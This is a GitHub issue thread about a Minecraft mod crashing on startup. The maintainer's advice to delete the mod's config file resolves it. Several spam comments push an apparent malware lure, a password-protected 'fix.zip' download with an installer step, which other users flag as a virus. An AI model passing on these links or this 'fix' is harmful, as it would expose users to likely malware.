### ISSUE TITLE
[BUG] Crash on Startup with 6.2.1 Fabric. MC 1.20.1

### ISSUE THREAD

**Issue by NolanHewitt** [Traben-0/EmissiveMod#300]
[crash-2024-08-25_20.08.34.0473-quilt_loader.txt](https://github.com/user-attachments/files/16742816/crash-2024-08-25_20.08.34.0473-quilt_loader.txt)

Crashes on start up using version 6.2.1 Fabric Version on MC 1.20.1. Version 6.2.0 has no issues.

- Minecraft version: 1.20.1
- ModLoader: Quilt
- ETF Version 6.2.1

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by SebSemos** [comment]
Don't click!

**Comment by NolanHewitt** [comment]
That looks like a virus link lol

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Traben-0** [comment]
Oh God spam bots here too now

**Comment by Traben-0** [comment]
It is complaining about your etf config file, can you delete the .json config file in your /config/ folder and try again

**Comment by NolanHewitt** [comment]
I tried that and its working now, thank you!
Here's my old config files in case it helps
[entity_texture_features.json](https://github.com/user-attachments/files/16760573/entity_texture_features.json)
